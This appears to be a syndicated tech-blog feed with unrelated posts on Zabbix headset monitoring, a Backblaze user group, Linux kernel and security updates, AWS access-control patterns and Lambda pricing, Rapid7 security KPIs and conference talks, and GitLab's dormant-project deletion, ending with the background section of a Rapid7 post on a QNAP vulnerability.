What’s Up, Home? – Living Inside an Audio Bubble

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-living-inside-an-audio-bubble/22541/

Can you monitor your Bluetooth headset usage hours with Zabbix? Of course you can!

By day, I earn my living as a monitoring tech lead in a global cyber security company. By night, I monitor my home with Zabbix and Grafana and do some weird experiments with them. Welcome to my weekly blog about how I monitor my home.

I adjust and tweak myself with the power of music. Finding the root cause of a severe outage, or just fixing some less severe error, becomes much more epic if I listen to Hans Zimmer’s music. Trance, drum ’n’ bass, demoscene music, and retro gaming music keep me afloat if I have simple, repetitive things to do. For some reason I write each and every one of these home monitoring entries with the soundtrack from the latest Batman movie playing in the background, and so forth.

My music listening habits, the online meetings at work, and the fact that I mostly work from home, just like my wife, mean that I use my Valco headphones for several hours a day. Valco claims that their headset can provide about 40 hours of runtime on a single charge, and that must be roughly true, as I only charge the headset on Sundays for it to be ready for a new week on Monday morning.

But how much do I really use my Valcos? Zabbix to the rescue!

Mac to Valco, Mac to Valco, please respond

As I use my headset mostly with a MacBook, I needed to find out how to get the connection status info from the macOS command line. I am sure there are more sophisticated ways of doing this, but the sledgehammer method I used is good enough for my home use.

On macOS, the system_profiler command gives you back tons of data, one element being the Bluetooth devices. Sure enough, my Valco headset is visible there, and so is its connection status.

Now that I have the data available, I could send all this text output to Zabbix and use Zabbix item preprocessing. This morning (yes, I created this whole thing only two or three hours ago) I did something else, though.

You know, while I was testing if my attempt works in real-time, I created a terrible shell one-liner, which I now also use with Zabbix.

system_profiler SPBluetoothDataType 2>/dev/null | grep -A10 "Valcoitus Bass:" | grep "Connected:" | cut -d ':' -f2 | xargs -I '{}' zabbix_sender -z my.zabbix.server -s "Zabbix server" -k valco.connected -o '{}'

Beautiful? No. Does it work? Yes. If I remove the zabbix_sender part, this is what happens: it returns “Yes” or “No”, indicating if my headphones are connected or not.

In other words, theoretically, this tells whether my headset is powered on and whether I am using it. In practice, I could of course have forgotten to turn the headset off, but that really does not happen.

My MacBook now runs the one-liner every minute via a cron job, so my Zabbix receives the data in near-enough real-time.

Zabbix time!

All my efforts and the zabbix_sender command are no good if I don’t do something on the Zabbix side, too.

With zabbix_sender, you need to set up a trapper item on the Zabbix side. It’s really not rocket science; check this out:

But wait! My shell responded with “Yes” or “No”, but the Type of information is set to numeric. Am I stupid? Careless? No. There’s also some preprocessing involved.

I changed the values to be numeric so I can get fancier with Grafana later on; with numeric data, I can get better statistics about how much I actually do use my headphones and get really creative.
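Since the preprocessing only maps “Yes”/“No” to a number, the same logic is easy to prototype outside Zabbix. Below is a rough Python sketch of parsing system_profiler-style output and emitting 1 or 0; the device name and sample text are illustrative, not real system_profiler output:

```python
# Sketch: find a named device in system_profiler-style output and map its
# "Connected" status to 1/0, the numeric form the trapper item expects.
# The sample text and device name below are illustrative.

SAMPLE = """\
Bluetooth:
    Connected:
        Valcoitus Bass:
            Address: AA:BB:CC:DD:EE:FF
            Connected: Yes
"""

def connected_status(profiler_output: str, device: str) -> int:
    lines = profiler_output.splitlines()
    for i, line in enumerate(lines):
        if line.strip() == f"{device}:":
            # Scan the following lines (like grep -A10) for a Connected: field.
            for follow in lines[i + 1:i + 11]:
                field = follow.strip()
                if field.startswith("Connected:"):
                    return 1 if field.split(":", 1)[1].strip() == "Yes" else 0
    return 0  # device not listed at all -> treat as disconnected

print(connected_status(SAMPLE, "Valcoitus Bass"))  # prints 1
```

Doing the mapping on the Mac before calling zabbix_sender would work just as well; keeping it in Zabbix preprocessing simply keeps the collection script dumb.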

Does it work?

Of course it does. Here is some of the latest data:

… and here’s a graph:

I will tell you next week how many hours I have spent inside my active noise-cancelling bubble. Probably too many, as any ear doctor would tell me.

I have been working at Forcepoint since 2014, and without music I would be way less productive. — Janne Pikkarainen

This post was originally published on the author’s LinkedIn account.

The post What’s Up, Home? – Living Inside an Audio Bubble appeared first on Zabbix Blog.

Announcing Backblaze B2 Virtual User Group – Come Join Us!

Post Syndicated from Greg Hamer original https://www.backblaze.com/blog/announcing-backblaze-b2-virtual-user-group-come-join-us/


Please join us on the third Wednesday of each month at 10 a.m. Pacific time for the free worldwide Backblaze B2 Virtual User Group!

At Backblaze, we work hard to make Backblaze B2 Cloud Storage as easy to implement as possible. However, what is easy for some can be a challenge for others. Wouldn’t it be great if you could have a forum where experienced professionals walk you through the best ways to fully leverage the power of Backblaze B2 Cloud Storage? Or an open, supportive meetup where you can ask questions and get answers from others who can share tips on their successes and failures with you?

To help make it easier for Backblaze B2 users to succeed, we are launching a free monthly Backblaze B2 Virtual User Group.

How to Sign Up for the Backblaze B2 Virtual User Group

If you think this user group may be of interest, please sign up using the form on the user group home page. Since our user group is an open community, registration for our meetings is not mandatory. However, signing up will help us keep you up to date about upcoming meetings and help us better address the needs of the community. Also, individuals who sign up will be added to a private, members-only Slack channel where user group members can communicate with each other easily outside of meetings.

Another option is to just bookmark the user group homepage, watch for meeting dates and topics, and get the public “Meeting Room Link.” Attending as an observer is OK, too.

What to Expect at the Virtual User Group

No matter where you are, this user group is for you. As a worldwide virtual user group, all you need is the link for the monthly meeting, currently scheduled for the third Wednesday of each month at 10 a.m. Pacific time, and you are good to go. It’s that easy!

Typically, meetings will have 1 hour and 15 minutes of content.

Backblaze team members will attend each meeting, so attending user group meetings will be a great way to get direct access to Backblaze’s technical personnel who deliver world-class Backblaze B2 Cloud Storage for you.

Because Backblaze B2 Cloud Storage is versatile and there are so many use cases, each meeting will focus on a different topic. Please check our user group home page and just join those meetings that are of interest to you. For our initial three meetings, we will focus first on developers, then on media and entertainment hosting and storage, and later on backup and archive.

Additional topics will be announced in the months ahead on our user group home page. If you have a topic not covered in our initial meetings, please let your voice be heard and mention it now in a comment below.

Why You Should Come

These virtual user group meetings will be a great way for you to meet and hear from people who successfully deliver solutions that you may want to adopt or improve for your own team’s workloads.

If you have solutions or helpful use cases you would be willing to share with others, our Backblaze Evangelism team is eager to hear from you.

You now have your official invitation! So please join our user community! We look forward to meeting you at our next user group meeting.

If you know anyone who may be interested in joining our user group meetings, we would appreciate your sharing this announcement with them.

Blaze on!

The post Announcing Backblaze B2 Virtual User Group – Come Join Us! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

[$] 6.0 Merge window, part 1

Post Syndicated from original https://lwn.net/Articles/903487/

The merge window for the kernel that will probably be called “6.0” has
gotten off to a strong start, with 6,820 non-merge changesets pulled into
the mainline repository in the first few days. The work pulled so far
makes changes all over the kernel tree; read on for a summary of what has
happened in the first half of this merge window.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/903997/

Security updates have been issued by CentOS (firefox, thunderbird, and xorg-x11-server), Debian (xorg-server), Gentoo (Babel, go, icingaweb2, lib3mf, and libmcpp), Oracle (389-ds:1.4, go-toolset:ol8, httpd, mariadb:10.5, microcode_ctl, and ruby:2.5), Red Hat (xorg-x11-server), Scientific Linux (xorg-x11-server), SUSE (buildah, go1.17, go1.18, harfbuzz, python-ujson, qpdf, u-boot, and wavpack), and Ubuntu (gnutls28, libxml2, mod-wsgi, openjdk-8, openjdk-8, openjdk-lts, openjdk-17, openjdk-18, and python-django).

Web application access control patterns using AWS services

Post Syndicated from Zili Gao original https://aws.amazon.com/blogs/architecture/web-application-access-control-patterns-using-aws-services/

The web application client-server pattern is widely adopted. Access control allows only authorized clients to access backend server resources by authenticating the client and providing granular access based on who the client is.

This post focuses on three solution architecture patterns that prevent unauthorized clients from gaining access to web application backend servers. There are multiple AWS services applied in these architecture patterns that meet the requirements of different use cases.

OAuth 2.0 authentication code flow

Figure 1 demonstrates the fundamentals common to all the architectural patterns discussed in this post. The blog post Understanding Amazon Cognito user pool OAuth 2.0 grants describes the details of the different OAuth 2.0 grants, which can vary the flow to some extent.

A typical OAuth 2.0 authentication code flow

Figure 1. A typical OAuth 2.0 authentication code flow

The architecture patterns detailed in this post use Amazon Cognito as the authorization server and Amazon Elastic Compute Cloud (Amazon EC2) instances as the resource server. The client can be any front-end application, such as a mobile application, that sends requests to the resource server to access protected resources.

Pattern 1

Figure 2 is an architecture pattern that offloads the work of authenticating clients to Application Load Balancer (ALB).

Application Load Balancer integration with Amazon Cognito

Figure 2. Application Load Balancer integration with Amazon Cognito

ALB can be used to authenticate clients through the user pool of Amazon Cognito:

  1. The client sends an HTTP request to the ALB endpoint without authentication-session cookies.
  2. The ALB redirects the request to the Amazon Cognito authentication endpoint. The client is authenticated by Amazon Cognito.
  3. The client is directed back to the ALB with the authentication code.
  4. The ALB uses the authentication code to obtain the access token from the Amazon Cognito token endpoint, and then uses the access token to get the client’s user claims from the Amazon Cognito UserInfo endpoint.
  5. The ALB prepares the authentication-session cookie containing encrypted data and redirects the client’s request with the session cookie. The client uses the session cookie for all further requests. The ALB validates the session cookie and decides whether the request can be passed through to its targets.
  6. The validated request is forwarded to the backend instances, with the ALB adding HTTP headers that contain the data from the access token and user-claims information.
  7. The backend server can use the information in the ALB-added headers for granular-level permission control.
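In step 6, the ALB carries the user claims to the backend in headers such as x-amzn-oidc-data, whose value is a JWT. As a sketch of what the backend in step 7 might do, here is how the payload segment of such a token can be decoded in Python; the demo token is self-made for illustration, and a real backend should also verify the JWT signature against the ALB’s regional public key:

```python
import base64
import json

def decode_jwt_payload(jwt: str) -> dict:
    """Decode the middle (payload) segment of a JWT without verifying it.

    Illustration only: production code must also verify the signature.
    """
    payload_b64 = jwt.split(".")[1]
    # Restore the base64 padding that JWT encoding strips.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Demo with a self-made token; the header and signature segments are dummies.
claims = {"sub": "user-123", "email": "user@example.com"}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
token = f"eyJhbGciOiJFUzI1NiJ9.{body}.signature"
print(decode_jwt_payload(token)["email"])  # prints user@example.com
```

The claim values recovered this way (subject, email, group memberships, and so on) are what the backend would feed into its granular permission checks.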

The key takeaway of this pattern is that the ALB maintains the whole authentication context by triggering client authentication with Amazon Cognito and prepares the authentication-session cookie for the client. The Amazon Cognito sign-in callback URL points to the ALB, which allows the ALB access to the authentication code.

More details about this pattern can be found in the documentation Authenticate users using an Application Load Balancer.

Pattern 2

The pattern demonstrated in Figure 3 offloads the work of authenticating clients to Amazon API Gateway.

Amazon API Gateway integration with Amazon Cognito

Figure 3. Amazon API Gateway integration with Amazon Cognito

API Gateway supports both REST APIs and HTTP APIs. It integrates with Amazon Cognito to authorize REST API requests, and it can control access to HTTP APIs with a JSON Web Token (JWT) authorizer, which interacts with Amazon Cognito. The ALB can be integrated with API Gateway. The client is responsible for authenticating with Amazon Cognito to obtain the access token.

  1. The client starts authentication with Amazon Cognito to obtain the access token.
  2. The client sends REST API or HTTP API request with a header that contains the access token.
  3. The API Gateway is configured to have:
    • Amazon Cognito user pool as the authorizer to validate the access token in REST API request, or
    • A JWT authorizer, which interacts with the Amazon Cognito user pool to validate the access token in HTTP API request.
  4. After the access token is validated, the REST or HTTP API request is forwarded to the ALB, and:
    • The API Gateway can route HTTP API to private ALB via a VPC endpoint.
    • If a public ALB is used, the API Gateway can route both REST API and HTTP API to the ALB.
  5. API Gateway cannot directly route REST API to a private ALB. It can route to a private Network Load Balancer (NLB) via a VPC endpoint. The private ALB can be configured as the NLB’s target.

The key takeaways of this pattern are:

  • API Gateway has built-in features to integrate with an Amazon Cognito user pool to authorize REST and/or HTTP API requests.
  • An ALB can be configured to only accept the HTTP API requests from the VPC endpoint set by API Gateway.

Pattern 3

Amazon CloudFront is able to trigger AWS Lambda functions deployed at AWS edge locations. This pattern (Figure 4) utilizes a feature of Lambda@Edge that lets it act as an authorizer, validating client requests using an access token, which is usually included in the HTTP Authorization header.

Using Amazon CloudFront and AWS Lambda@Edge with Amazon Cognito

Figure 4. Using Amazon CloudFront and AWS Lambda@Edge with Amazon Cognito

The client can have an individual authentication flow with Amazon Cognito to obtain the access token before sending the HTTP request.

  1. The client starts authentication with Amazon Cognito to obtain the access token.
  2. The client sends an HTTP request with an Authorization header, which contains the access token, to the CloudFront distribution URL.
  3. The CloudFront viewer request event triggers the launch of the function at Lambda@Edge.
  4. The Lambda function extracts the access token from the Authorization header, and validates the access token with Amazon Cognito. If the access token is not valid, the request is denied.
  5. If the access token is validated, the request is authorized and forwarded by CloudFront to the ALB. CloudFront is configured to add a custom header with a value that can only be shared with the ALB.
  6. The ALB sets a listener rule to check if the incoming request has the custom header with the shared value. This makes sure the internet-facing ALB only accepts requests that are forwarded by CloudFront.
  7. To enhance the security, the shared value of the custom header can be stored in AWS Secrets Manager. Secrets Manager can trigger an associated Lambda function to rotate the secret value periodically.
  8. The Lambda function also updates CloudFront for the added custom header and ALB for the shared value in the listener rule.
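As a rough sketch of steps 3 and 4, a Lambda@Edge viewer-request handler has the shape below: it returns the request object to let CloudFront continue, or a response object to deny. The actual token validation (checking the JWT signature, expiry, and audience against the Cognito user pool) is stubbed out here as a placeholder:

```python
def token_is_valid(token: str) -> bool:
    # Placeholder: a real implementation would verify the JWT signature,
    # expiry, and audience against the Amazon Cognito user pool.
    return token == "valid-token"

def handler(event, context):
    # CloudFront delivers the viewer request under Records[0].cf.request.
    request = event["Records"][0]["cf"]["request"]
    auth = request.get("headers", {}).get("authorization", [])
    token = auth[0]["value"] if auth else ""
    if token.startswith("Bearer "):
        token = token[len("Bearer "):]
    if not token_is_valid(token):
        # Deny: returning a response object makes CloudFront answer directly.
        return {
            "status": "401",
            "statusDescription": "Unauthorized",
            "body": "Access denied",
        }
    # Allow: returning the request lets CloudFront forward it to the origin.
    return request
```

Returning the request unchanged is what lets CloudFront add the shared custom header (steps 5 and 6) and forward the call to the ALB.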

The key takeaways of this pattern are:

  • By default, CloudFront removes the Authorization header before forwarding the HTTP request to its origin, so CloudFront needs to be configured to forward the Authorization header to the ALB origin. The backend server uses the access token to apply granular levels of resource-access permission.
  • The use of Lambda@Edge requires the function to be deployed in the us-east-1 Region.
  • The CloudFront-added custom header’s value is kept as a secret that can only be shared with the ALB.

Conclusion

The architectural patterns discussed in this post are token-based web access control methods that are fully supported by AWS services. The approach offloads the OAuth 2.0 authentication flow from the backend server to AWS services. The services managed by AWS can provide the resilience, scalability, and automated operability for applying access control to a web application.

Building Cybersecurity KPIs for Business Leaders and Stakeholders

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/08/05/building-cybersecurity-kpis-for-business-leaders-and-stakeholders/

Building Cybersecurity KPIs for Business Leaders and Stakeholders

In the final part of our “Hackers ‘re Gonna Hack” series, we’re discussing how to bring parts one and two of operationalising cybersecurity together into an overall strategy for your organisation, measured by key performance indicators (KPIs).

In part one, we spoke about the problem, which is the increasing cost (and risk) of cybersecurity, and proposed some solutions for making your budget go further.

In part two, we spoke about the foundational components of a target operating model and what that could look like for your business. In the third installment of our webinar series, we summarise the foundational elements required to keep pace with the changing threat landscape. In this talk, Jason Hart, Rapid7’s Chief Technology Officer for EMEA, discusses how to move from your current operating model to a target operating model, one that is understood by all and underpinned by KPIs the entire business will understand.

First, determine your current operating model

With senior stakeholders looking to you to help them understand risk and exposure, now is the time to highlight what you’re trying to achieve through your cybersecurity efforts. However, the reality is that most organisations have no granular visibility of their current operating model or even their approach to cybersecurity. A significant amount of money is likely being spent on deployment of technology across the organisation, which in turn garners a large amount of complex data. Yet, for the most part, security leaders find it hard to translate that data into something meaningful for their business leaders to understand.

In creating cyber KPIs, it’s important they are formed as part of a continual assessment of cyber maturity within your organisation. That means determining what business functions would have the most significant impact if they were compromised. Once you have discovered these functions, you can identify your essential data and locations, creating and attaching KPIs to the core six foundations we spoke of in part two. This will allow you to assess your level of maturity to determine your current operating model and begin setting KPIs to understand where you need to go to reach your target operating model.

Focus on 3 priority foundations

However, we all know cybersecurity is a wide-ranging discipline, making it a complex challenge that requires a holistic approach. It’s not possible to simply focus on one aspect and expect to be successful. We advise that, to begin with, security leaders consider three priority foundations: culture, measurement, and accountability.

For cybersecurity to have a positive and successful impact, we need to change our stakeholders’ mindsets to make it part of organisational culture. Everyone needs to understand its importance and why it’s necessary. We can’t simply assume everyone knows what is essential and that they’ll act. Instead, we need to measure our progress towards improving cybersecurity and hold people accountable for their efforts.

Translate cybersecurity problems into business problems

Cybersecurity problems are fundamentally business problems. That’s why it’s essential to translate them into business terms by creating KPIs for measuring the effectiveness of your cyber initiatives.

These KPIs can help you and your stakeholders understand where your organisation needs improvements, so you can develop a plan everyone understands. The core components that drive the effectiveness of a KPI begin with defining the target, the owner, and accountability. The target is the business function or system that needs improvement. The owner is responsible for implementing the programme or meeting the KPI. Accountability is defined as who will review the data regularly to ensure progress towards achieving desired results.

40% of our webinar’s audience said they don’t currently use cybersecurity KPIs.

Additionally, when developing KPIs, it’s crucial to think about what information you’ll need to collect for them to be effective in helping you achieve your goals. KPIs are great, but to be successful, they need data. And once data is being fed into the KPIs, as security leaders, we need to translate the “technical stuff” – that is, talk about it in a way the business understands.

Remember, it’s about people, processes, and technology. Technology provides the data; processes are the glue that brings it together and makes cybersecurity part of the business process. And the people element is about taking the organisation on a journey. We need to present our KPIs to stakeholders, both technical and non-technical, in a way the organisation will understand.

Share and build the journey

As a security leader, you need to drive your company’s cybersecurity strategy and deploy it across all levels of your organisation, from the boardroom to the front lines of customer experience. However, we know that the approach we’re taking today isn’t working, as highlighted by the significant amounts of money we’re trying to throw at the problem.

So we need to take a different approach, going from a current to a target operating model, underpinned by KPIs that are further underpinned by data to take you in the direction you need to go. Not only will it reduce your organisational risk, but it will reduce your operational costs, too. But more importantly, it will translate what’s a very technical industry into a way everyone in your organisation will understand. It’s about a journey.

To find out what tools, processes, methodologies, and KPIs are needed to articulate key cybersecurity goals and objectives while illustrating ROI and keeping stakeholders accountable, watch part three of “Cybersecurity Series: Hackers ‘re Gonna Hack.”


Introducing tiered pricing for AWS Lambda

Post Syndicated from Sam Dengler original https://aws.amazon.com/blogs/compute/introducing-tiered-pricing-for-aws-lambda/

This blog post is written by Heeki Park, Principal Solutions Architect, Serverless.

AWS Lambda charges for on-demand function invocations based on two primary parameters: invocation requests and compute duration, measured in GB-seconds. If you configure additional ephemeral storage for your function, Lambda also charges for ephemeral storage duration, measured in GB-seconds.

AWS continues to find ways to help customers reduce the cost of running on Lambda. In February 2020, AWS announced that AWS Lambda would participate in Compute Savings Plans. In December 2020, AWS announced 1 ms billing granularity to help customers save on cost for their Lambda function invocations. With that pricing change, customers whose function duration is less than 100 ms pay less for those function invocations. In September 2021, AWS announced Graviton2 support for running your function on Arm, with potential price-performance improvements for compute.

Today, AWS introduces tiered pricing for Lambda. With tiered pricing, customers who run large workloads on Lambda can automatically save on their monthly costs. Tiered pricing is based on compute duration measured in GB-seconds. The tiered pricing breaks down as follows:

Compute duration (GB-seconds)   Architecture   New tiered discount
0 – 6 billion                   x86            Same as today
6 – 15 billion                  x86            10%
Anything over 15 billion        x86            20%
0 – 7.5 billion                 arm64          Same as today
7.5 – 18.75 billion             arm64          10%
Anything over 18.75 billion     arm64          20%

The Lambda pricing page lists the pricing for all Regions and architectures.

Tiered pricing discount example

Consider a financial services provider who provides on-demand stock portfolio analysis. The customers pay per portfolio analyzed and find the service valuable for providing them insight into the performance of those assets. The application is built using Lambda, runs on x86, and is optimized to use 2048 MB (2 GB) of memory with an average function duration of 60 seconds. This current month resulted in 75 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 75M * $0.20/million = $15.00
Monthly compute duration (seconds): 75M * 60 seconds = 4.5B seconds
Monthly compute (GB-seconds): 4.5B seconds * 2 GB = 9B GB-seconds
Monthly compute duration charges: 9B GB-s * $0.0000166667/GB-s = $150,000.30
Total monthly charges = request charges + compute duration charges = $15.00 + $150,000.30 = $150,015.30

With tiered pricing, the portion of compute duration that exceeds 6B GB-seconds receives an automatic discount as follows:

Monthly request charges: 75M * $0.20/million = $15.00
Monthly compute duration (seconds): 75M * 60 seconds = 4.5B seconds
Monthly compute (GB-seconds): 4.5B seconds * 2GB = 9B GB-seconds
Monthly compute duration charge (tier 1): 6B GB-s * $0.0000166667/GB-s = $100,000.20
Monthly compute duration charge (tier 2): 3B GB-s * $0.0000150000/GB-s = $45,000.09
Monthly compute duration charges (post-discount): $100,000.20 + $45,000.09 = $145,000.29.
Total monthly charges = request charges + compute duration charges = $15.00 + $145,000.29 = $145,015.29 ($5,000.01 cost savings)

Tiered pricing discount example with increased growth

The service is successful and usage in the following month quadruples, resulting in 300 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 300M * $0.20/million = $60.00
Monthly compute duration (seconds): 300M * 60 seconds = 18B seconds
Monthly compute (GB-seconds): 18B seconds * 2GB = 36B GB-seconds
Monthly compute duration charges: 36B GB-s * $0.0000166667/GB-s = $600,001.20
Total monthly charges = request charges + compute duration charges = $60.00 + $600,001.20 = $600,061.20

With tiered pricing, the compute duration portion now also exceeds 15B GB-seconds and receives an automatic discount as follows:

Monthly request charges: 300M * $0.20/million = $60.00
Monthly compute duration (seconds): 300M * 60 seconds = 18B seconds
Monthly compute (GB-seconds): 18B seconds * 2GB = 36B GB-seconds
Monthly compute duration charge (tier 1): 6B GB-s * $0.0000166667/GB-s = $100,000.20
Monthly compute duration charge (tier 2): 9B GB-s * $0.0000150000/GB-s = $135,000.27
Monthly compute duration charge (tier 3): 21B GB-s * $0.0000133333/GB-s = $280,000.56
Monthly compute duration charges (post-discount): $100,000.20 + $135,000.27 + $280,000.56 = $515,001.03.
Total monthly charges = request charges + compute duration charges = $60.00 + $515,001.03 = $515,061.03 ($85,000.17 cost savings)

Tiered pricing discount example with decreased growth

Alternatively, suppose customers used the service less frequently than expected. As a result, usage in the following month is one-third of the first month’s usage, resulting in 25 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 25M * $0.20/million = $5.00
Monthly compute duration (seconds): 25M * 60 seconds = 1.5B seconds
Monthly compute (GB-seconds): 1.5B seconds * 2GB = 3B GB-seconds
Monthly compute duration charges: 3B GB-s * $0.0000166667/GB-s = $50,000.10
Total monthly charges = request charges + compute duration charges = $5.00 + $50,000.10 = $50,005.10

When considering tiered pricing, the compute duration portion is under 6B GB-s and is priced without any additional pricing discounts. In this case, the financial services provider did not grow the business as expected or take advantage of tiered pricing. However, they did take advantage of Lambda’s pay-as-you-go model, paying only for the compute that this application used.
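The three worked examples above can be double-checked with a few lines of code. The sketch below hard-codes the x86 tier boundaries from the table and the per-GB-second rate used in the examples; it is an illustration of how the tiers stack, not a billing tool:

```python
# Rates as used in the examples above (x86); tier boundaries from the table.
REQUEST_RATE = 0.20 / 1_000_000          # per invocation
BASE_RATE = 0.0000166667                 # per GB-second, tier 1
X86_TIERS = [(6e9, 1.0), (9e9, 0.9), (float("inf"), 0.8)]  # (tier width, rate multiplier)

def monthly_cost(invocations: float, avg_seconds: float, memory_gb: float) -> float:
    gb_seconds = invocations * avg_seconds * memory_gb
    cost = invocations * REQUEST_RATE
    remaining = gb_seconds
    for width, multiplier in X86_TIERS:
        chunk = min(remaining, width)           # GB-seconds billed in this tier
        cost += chunk * BASE_RATE * multiplier  # discount applied per tier
        remaining -= chunk
        if remaining <= 0:
            break
    return round(cost, 2)

print(monthly_cost(75e6, 60, 2))   # 145015.29, matching the first example
print(monthly_cost(300e6, 60, 2))  # 515061.03, matching the growth example
print(monthly_cost(25e6, 60, 2))   # 50005.1, matching the reduced-usage example
```

Note that the discount applies per tier, not to the whole bill: every workload pays the full rate for its first 6B GB-seconds, and only the usage above each threshold gets the corresponding multiplier.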

Summary and other considerations

Tiered pricing for Lambda applies to the compute duration portion of your on-demand function invocations. It is specific to the architecture (x86 or arm64) and is bucketed by Region. Refer to the previous table for the specific pricing tiers.

For example, consider a function using the x86 architecture, deployed in both us-east-1 and us-west-2. Usage in us-east-1 is bucketed and priced separately from usage in us-west-2. If there is a function using the arm64 architecture in us-east-1 and us-west-2, its usage falls into separate buckets as well.

The cost for invocation requests remains the same. The discount applies only to on-demand compute duration and does not apply to provisioned concurrency. Customers who also purchase Compute Savings Plans (CSPs) can take advantage of both, where Lambda applies tiered pricing first, followed by CSPs.

Conclusion

With tiered pricing for Lambda, you can save on the compute duration portion of your monthly Lambda bills. This allows you to architect, build, and run large-scale applications on Lambda and take advantage of these tiered prices automatically.

For more information on tiered pricing for Lambda, see: https://aws.amazon.com/lambda/pricing/.

GitLab plans to delete dormant projects in free accounts (Register)

Post Syndicated from original https://lwn.net/Articles/903858/

The Register reports
that GitLab is planning to start deleting repositories belonging to free
accounts if they have been inactive for at least a year.

GitLab is aware of the potential for angry opposition to the plan,
and will therefore give users weeks or months of warning before
deleting their work. A single comment, commit, or new issue posted
to a project during a 12-month period will be sufficient to keep
the project alive.

What We’re Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/

What We're Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

The week of Black Hat, DEF CON, and BSides is a highly anticipated annual tradition for the cybersecurity community, a weeklong chance for security pros from all corners of the industry to meet in Las Vegas to talk shop and share what they’ve spent the last 12 months working on.

But like many beloved in-person events, 2020 and 2021 put a major damper on this tradition for the security community, known unofficially as Hacker Summer Camp. Black Hat returned in 2021, but with a much heavier emphasis than in previous years on virtual events over in-person offerings, and many of those who would have attended in non-COVID times opted to take in the briefings from their home offices instead of flying out to Vegas.

This year, however, the week of Black Hat is back in action, in a form that feels much more familiar for those who’ve spent years making the pilgrimage to Vegas each August. That includes a whole lot of Rapid7 team members — it’s been a busy few years for our research and product teams alike, and we’ve got a lot to catch our colleagues up on. Here’s a sneak peek of what we have planned from August 9-12 at this all-star lineup of cybersecurity sessions.

BSidesLV

The week kicks off on Tuesday, August 9 with BSides, a two-day event running on the 9th and 10th that gives security pros, and those looking to enter the field, a chance to come together and share knowledge. Several Rapid7 presenters will be speaking at BSidesLV, including:

  • Ron Bowes, Lead Security Researcher, who will talk about the surprising overlap between spotting cybersecurity vulnerabilities and writing capture-the-flag (CTF) challenges in his presentation “From Vulnerability to CTF.”
  • Jen Ellis, Vice President of Community and Public Affairs, who will cover the ways in which ransomware and major vulnerabilities have impacted the thinking and decisions of government policymakers in her talk “Hot Topics From Policy and the DoJ.”

Black Hat

The heart of the week’s activities, Black Hat, features the highest concentration of presentations out of the three conferences. Our Research team will be leading the charge for Rapid7’s sessions, with appearances from:

  • Curt Barnard, Principal Security Researcher, who will talk about a new way to search for default credentials more easily in his session, "Defaultinator: An Open Source Search Tool for Default Credentials."
  • Spencer McIntyre, Lead Security Researcher, who’ll be covering the latest in modern attack emulation in his presentation, "The Metasploit Framework."
  • Jake Baines, Lead Security Researcher, who’ll be giving not one but two talks at Black Hat.
    • He’ll cover newly discovered vulnerabilities affecting the Cisco ASA and ASA-X firewalls in "Do Not Trust the ASA, Trojans!"
    • Then, he’ll discuss how the Rapid7 Emergent Threat Response team manages an ever-changing vulnerability landscape in "Learning From and Anticipating Emergent Threats."
  • Tod Beardsley, Director of Research, who’ll be beamed in virtually to tell us how we can improve the coordinated, global vulnerability disclosure (CVD) process in his on-demand presentation, "The Future of Vulnerability Disclosure Processes."

We’ll also be hosting a Community Celebration to welcome our friends and colleagues back to Hacker Summer Camp. Come hang out with us, play games, collect badges, and grab a super-exclusive Rapid7 Hacker Summer Camp t-shirt. Head to our Black Hat event page to preregister today!

DEF CON

Rounding out the week, DEF CON offers lots of opportunities for learning and listening as well as hands-on immersion in its series of “Villages.” Rapid7 experts will be helping run two of these Villages:

  • The IoT Village, where Deral Heiland, Principal Security Researcher for IoT, will take attendees through a multistep process for hardware hacking.
  • The Car Hacking Village, where Patrick Kiley, Principal Security Consultant/Research Lead, will teach you about hacking actual vehicles in a safe, controlled environment.

We’ll also have no shortage of in-depth talks from our team members, including:

  • Harley Geiger, Public Policy Senior Director, who’ll cover how legislative changes impact the way security research is carried out worldwide in his talk, "Hacking Law Is for Hackers: How Recent Changes to CFAA, DMCA, and Other Laws Affect Security Research."
  • Jen Ellis, who’ll give two talks at DEF CON:
    • "Moving Regulation Upstream: An Increasing Focus on the Role of Digital Service Providers," where she’ll discuss the challenges of drafting effective regulations in an environment where attackers often target smaller organizations that exist below the cybersecurity poverty line.
    • "International Government Action Against Ransomware," a deep dive into policy actions taken by global governments in response to the recent rise in ransomware attacks.
  • Jake Baines, who’ll be giving his talk "Do Not Trust the ASA, Trojans!" on Saturday, August 13, in case you weren’t able to catch it earlier in the week at Black Hat.

Whew, that’s a lot — time to get your itinerary sorted. Get the full details of what we’re up to at Hacker Summer Camp, and sign up for our Community Celebration on Wednesday, August 10, at our Black Hat 2022 event page.


QNAP Poisoned XML Command Injection (Silently Patched)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/

Background


CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.


CVE-2020-2509 is allegedly an unauthenticated remote command injection vulnerability affecting QNAP Network Attached Storage (NAS) devices using the QTS operating system. The vulnerability was discovered by SAM and publicly disclosed on March 31, 2021. Two weeks later, QNAP issued a CVE and an advisory.

